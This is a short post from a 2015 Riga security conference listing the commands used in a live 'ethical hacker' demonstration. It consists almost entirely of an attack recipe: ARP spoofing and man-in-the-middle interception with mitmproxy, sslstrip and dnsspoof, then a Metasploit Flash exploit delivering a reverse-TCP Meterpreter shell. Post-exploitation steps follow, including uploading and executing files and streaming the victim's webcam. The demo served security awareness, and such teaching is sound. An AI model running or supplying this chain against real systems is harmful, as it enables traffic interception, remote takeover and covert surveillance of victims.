DSS 2015 Riga

Ethical Hacker in Action @DSS2015 that took place in Riga on 22-Oct-2015:

• Link to an Event page:  http://event.dss.lv/ethical-hacker-real-action
• or YouTube: https://www.youtube.com/watch?v=o0pUChpnebA

I know that got failed a lot of times during this presentation. But I know, you gonna seal your webcam, anyway .)

There goes a list of exercises that were executed during this session:

• Checking current IP configuration: ifconfig
• Network host discovery: nmap -sP -T4 %IP_Subnet%
• Enabling Forwarding, MitM requirement: sysctl net.ipv4.conf.all.forwarding=1
• ARP Spoofing, both directions required: arpspoof -t %IP_Victim% %IP_Router%
• URL Inspection: urlsnarf
• Picture Interception: driftnet
• Enabling port redirection for MitM Proxy: iptables -t nat -A PREROUTING -i eth0 -p tcp —dport 80 -j REDIRECT —to-port 8080
• Running MitM Proxy: mitmproxy -T —host
• Cancelling port redirection: iptables -t nat -D PREROUTING -i eth0 -p tcp —dport 80 -j REDIRECT —to-port 8080
• Preventing redirection from HTTP to HTTPS: sslstrip -p -k -l 8000
• DNS Spoofing: dnsspoof -f /root/Desktop/dns.txt
• Launching Metasploit Framework console: msfconsole

Metasploit exploit configuration:

• use exploit/multi/browser/adobe_flash_hacking_team_uaf
• set target 0
• set srvport 80
• set uripath /
• set payload windows/meterpreter/reverse_tcp
• set lhost %IP_Hacker%
• exploit
• sessions -i 1

Metepreter commands executed on a victim machine:

• Get current user name: getuid
• Get process list: ps
• Get current process ID: getpid
• Migrate to another process: migrate %New_PID%
• Get current working directory: getwd
• Navigate to another folder: cd %Folder_Name%
• Upload executable from attacker to a victim: upload %Executable_Name%
• Execute remote executable: execute -f %Executable_Name%
• Kill a process on a victim machine: kill %PID%
• Disconnect from a session w/o closing it: background
• List webcams on a victim machine: webcam_list
• Capture video from a webcam: webcam_stream